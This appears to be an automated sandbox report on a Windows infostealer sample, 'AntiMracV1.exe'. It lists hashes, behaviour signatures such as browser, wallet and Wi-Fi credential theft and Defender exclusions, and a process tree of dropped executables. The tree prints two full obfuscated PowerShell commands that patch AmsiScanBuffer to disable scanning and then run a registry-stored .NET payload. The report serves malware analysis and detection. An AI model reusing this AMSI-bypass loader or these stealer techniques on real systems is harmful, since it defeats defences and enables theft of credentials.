Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-uk
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-uklocale:uk-uaos:windows10-2004-x64systemwindows
  • submitted
    20-11-2024 15:04

General

  • Target

    AntiMracV1.exe

  • Size

    29.1MB

  • MD5

    f3e0c268199e4f788421716fde6f0760

  • SHA1

    3d2ad93f3f989bb736062ffaa6fdd03c1368b19a

  • SHA256

    e0f8fd9eb2e8f226afac9450bc4f471a19cf7c89be86163019e3d646200279d5

  • SHA512

    66a6def1c946560f92c1a5a84173e4f9e1b9d33afb53fc3ccedbad56898cbb1e4c3b6ea138d0f91af71b7885fa1c4ca2b2ac162fb968d554fd8cf3bedff67fd0

  • SSDEEP

    786432:WbjeRNCEDUQpt6ZkMpLdn3WpSrONCL79USlqZr6Y:CKRNCjCvMpLdRONpSk+Y

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Drops file in Drivers directory 5 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 18 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 48 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{67deb23a-4ebe-4c50-95df-819b389ab5f9}
          2⤵
            PID:4356
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{880e2b32-799b-4b86-86ef-d7c64745a732}
            2⤵
              PID:3012
          • C:\Windows\system32\lsass.exe
            C:\Windows\system32\lsass.exe
            1⤵
              PID:672
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
              1⤵
                PID:960
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:728
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                  1⤵
                    PID:956
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1116
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2844
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tOxhWeCVjTuv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qkmXqHXtyEacVs,[Parameter(Position=1)][Type]$SdfNAnPyxO)$JKtIJzPwjvW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+'ec'+[Char](116)+''+'e'+'dD'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+'y'+'pe','C'+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+'n'+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$JKtIJzPwjvW.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'ial'+'N'+''+'a'+''+'m'+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$qkmXqHXtyEacVs).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JKtIJzPwjvW.DefineMethod('I'+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+'Sig'+[Char](44)+''+[Char](78)+''+'e'+'wS'+'l'+''+[Char](111)+'t'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$SdfNAnPyxO,$qkmXqHXtyEacVs).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');Write-Output $JKtIJzPwjvW.CreateType();}$dBHLahmcdTCWr=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'st'+[Char](101)+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+'i'+'c'+'r'+'os'+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+'W'+'i'+[Char](110)+'32.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+'i'+'veM'+[Char](101)+'tho'+[Char](100)+''+'s'+'');$QAqSVqaQnczCEd=$dBHLahmcdTCWr.GetMethod('G'+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+'A'+'d'+'d'+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QosgRVIJHDgoDhzxqKO=tOxhWeCVjTuv @([String])([IntPtr]);$OycqdTFKDeZGlTPzzVXdTx=tOxhWeCVjTuv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wjRpAhJVCJg=$dBHLahmcdTCWr.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+'o'+''+'d'+''+'u'+'l'+'e'+'H'+[Char](97)+''+'n'+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+'nel3'+[Char](50)+''+'.'+''+[Char](100)+'ll')));$LcMmYDQKhHCRoI=$QAqSVqaQnczCEd.Invoke($Null,@([Object]$wjRpAhJVCJg,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dLib'+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$pvdFMeFwuqsPEKDlH=$QAqSVqaQnczCEd.Invoke($Null,@([Object]$wjRpAhJVCJg,[Object]('Vi'+'r'+''+[Char](116)+'ual'+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$XHGpWuz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LcMmYDQKhHCRoI,$QosgRVIJHDgoDhzxqKO).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$NkfBmiqgkUROBbwbi=$QAqSVqaQnczCEd.Invoke($Null,@([Object]$XHGpWuz,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+'f'+'e'+[Char](114)+'')));$MWBReHDYcf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pvdFMeFwuqsPEKDlH,$OycqdTFKDeZGlTPzzVXdTx).Invoke($NkfBmiqgkUROBbwbi,[uint32]8,4,[ref]$MWBReHDYcf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NkfBmiqgkUROBbwbi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pvdFMeFwuqsPEKDlH,$OycqdTFKDeZGlTPzzVXdTx).Invoke($NkfBmiqgkUROBbwbi,[uint32]8,0x20,[ref]$MWBReHDYcf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue('d'+[Char](105)+'a'+[Char](108)+''+'e'+'r'+[Char](115)+'ta'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        PID:928
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bkoWFUpZXFlp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cHzDDVNCsSBBLK,[Parameter(Position=1)][Type]$ioojgzSjvb)$zGxQDuJpWxE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+'l'+'e'+''+'g'+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+'ubl'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+'s'+[Char](115)+','+'A'+''+[Char](117)+'t'+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$zGxQDuJpWxE.DefineConstructor(''+'R'+'T'+[Char](83)+'pe'+[Char](99)+'ia'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+'Sig'+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$cHzDDVNCsSBBLK).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'ti'+[Char](109)+''+'e'+''+','+''+'M'+'an'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$zGxQDuJpWxE.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'k'+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+'c'+''+','+'H'+'i'+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+'rt'+'u'+'a'+[Char](108)+'',$ioojgzSjvb,$cHzDDVNCsSBBLK).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'e'+[Char](100)+'');Write-Output $zGxQDuJpWxE.CreateType();}$AdMfyEmuNgbrH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+'o'+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+'f'+'e'+''+[Char](78)+'a'+'t'+'i'+[Char](118)+''+'e'+'M'+'e'+'t'+'h'+'o'+'d'+''+[Char](115)+'');$bAnQJOJMHNossj=$AdMfyEmuNgbrH.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c,'+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ArtgjvcnOeaKwBSYJjV=bkoWFUpZXFlp @([String])([IntPtr]);$MhzgdkLyJSMZwuJCsSPZYQ=bkoWFUpZXFlp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UufUAurxcUg=$AdMfyEmuNgbrH.GetMethod('Ge'+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+'a'+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$MHnHvFkQOuBmKv=$bAnQJOJMHNossj.Invoke($Null,@([Object]$UufUAurxcUg,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+'b'+'r'+[Char](97)+''+'r'+''+'y'+'A')));$eVIeYVhilCpgkjrow=$bAnQJOJMHNossj.Invoke($Null,@([Object]$UufUAurxcUg,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$VjceXNU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MHnHvFkQOuBmKv,$ArtgjvcnOeaKwBSYJjV).Invoke(''+'a'+'ms'+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$LvbMQsQopBAKWvpur=$bAnQJOJMHNossj.Invoke($Null,@([Object]$VjceXNU,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'can'+[Char](66)+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+'r')));$ocrSpycmkW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eVIeYVhilCpgkjrow,$MhzgdkLyJSMZwuJCsSPZYQ).Invoke($LvbMQsQopBAKWvpur,[uint32]8,4,[ref]$ocrSpycmkW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LvbMQsQopBAKWvpur,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eVIeYVhilCpgkjrow,$MhzgdkLyJSMZwuJCsSPZYQ).Invoke($LvbMQsQopBAKWvpur,[uint32]8,0x20,[ref]$ocrSpycmkW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+'a'+'l'+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        PID:2516
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:1400
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        1⤵
                          PID:1128
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1140
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                              PID:1176
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1272
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                1⤵
                                  PID:1300
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1368
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1408
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                      1⤵
                                        PID:1452
                                        • C:\Windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:2600
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                          1⤵
                                            PID:1572
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                            1⤵
                                              PID:1580
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1660
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                1⤵
                                                  PID:1708
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1756
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1776
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1828
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                        1⤵
                                                          PID:1960
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:1964
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                            1⤵
                                                              PID:1984
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                              1⤵
                                                                PID:1016
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                1⤵
                                                                  PID:2076
                                                                • C:\Windows\System32\spoolsv.exe
                                                                  C:\Windows\System32\spoolsv.exe
                                                                  1⤵
                                                                    PID:2188
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                    1⤵
                                                                      PID:2204
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                      1⤵
                                                                        PID:2344
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2628
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                          1⤵
                                                                            PID:2660
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                            1⤵
                                                                              PID:2668
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                              1⤵
                                                                              • Drops file in System32 directory
                                                                              PID:2772
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:2800
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                1⤵
                                                                                  PID:2852
                                                                                • C:\Windows\sysmon.exe
                                                                                  C:\Windows\sysmon.exe
                                                                                  1⤵
                                                                                    PID:2872
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                    1⤵
                                                                                      PID:2904
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                      1⤵
                                                                                        PID:2924
                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3124
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                          1⤵
                                                                                            PID:3488
                                                                                          • C:\Windows\Explorer.EXE
                                                                                            C:\Windows\Explorer.EXE
                                                                                            1⤵
                                                                                              PID:3600
                                                                                              • C:\Users\Admin\AppData\Local\Temp\AntiMracV1.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\AntiMracV1.exe"
                                                                                                2⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2496
                                                                                                • C:\Users\Admin\AppData\Local\Temp\AntiMracV1.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\AntiMracV1.exe"
                                                                                                  3⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4932
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
                                                                                                    4⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3592
                                                                                                    • C:\Windows\System32\wbem\WMIC.exe
                                                                                                      C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
                                                                                                      5⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:632
                                                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                                                    reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
                                                                                                    4⤵
                                                                                                      PID:4352
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "ver"
                                                                                                      4⤵
                                                                                                        PID:3348
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\updater_update.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\updater_update.exe
                                                                                                        4⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:2716
                                                                                                        • C:\Users\Admin\AppData\Roaming\main.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\main.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:2748
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            6⤵
                                                                                                              PID:3956
                                                                                                            • C:\Users\Admin\AppData\Roaming\main.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\main.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:3008
                                                                                                          • C:\Users\Admin\AppData\Roaming\drv.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\drv.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:4780
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\onefile_4780_133765887270946068\Loader2.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\drv.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:1908
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\upinstall.exe
                                                                                                                7⤵
